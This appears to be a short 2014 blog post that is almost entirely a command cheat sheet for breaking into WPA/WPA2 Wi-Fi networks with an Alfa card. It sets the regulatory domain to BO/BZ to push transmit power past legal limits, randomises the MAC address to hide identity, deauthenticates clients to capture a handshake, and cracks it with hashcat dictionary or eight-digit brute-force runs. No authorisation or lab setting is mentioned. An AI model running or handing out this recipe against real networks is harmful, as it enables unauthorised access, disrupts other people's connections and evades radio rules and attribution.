Wednesday, July 9, 2014

How to obtain a WPA / WPA2 Handshake (Alfa card) and brute it with oclHashCat

#Increase Wi-Fi TX Power
ifconfig wlan0 down

iw reg ser BO BZ
iwconfig wlan0 txpower 1000mW
ifconfig wlan0 up

#Start mon0 interface

airmon-ng check kill
airmon-ng start wlan0

#Change MAC
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up

#List available AP
airodump mon0

#Dump handshake
airodump-ng -w <out.cap> --bssid <BSSID> -c <channel> mon0

#Deauthentication 
aireplay-ng  --deauth 5 -a <BSSID> -c <ClientMAC> wlan0
or
aireplay-ng --deauth 0 -a <BSSID> mon0

#Cracking WPA/WPA2 with oclHashcat
aircrack-ng <out.cap> -J <out.hccap>

Dictionary attack
./cudaHashcat64.bin -m 2500 <out.hccap> <dictionary.txt>
or Brute-Force
./cudaHashcat64.bin -m 2500 -a3 <out.hccap> ?d?d?d?d?d?d?d?d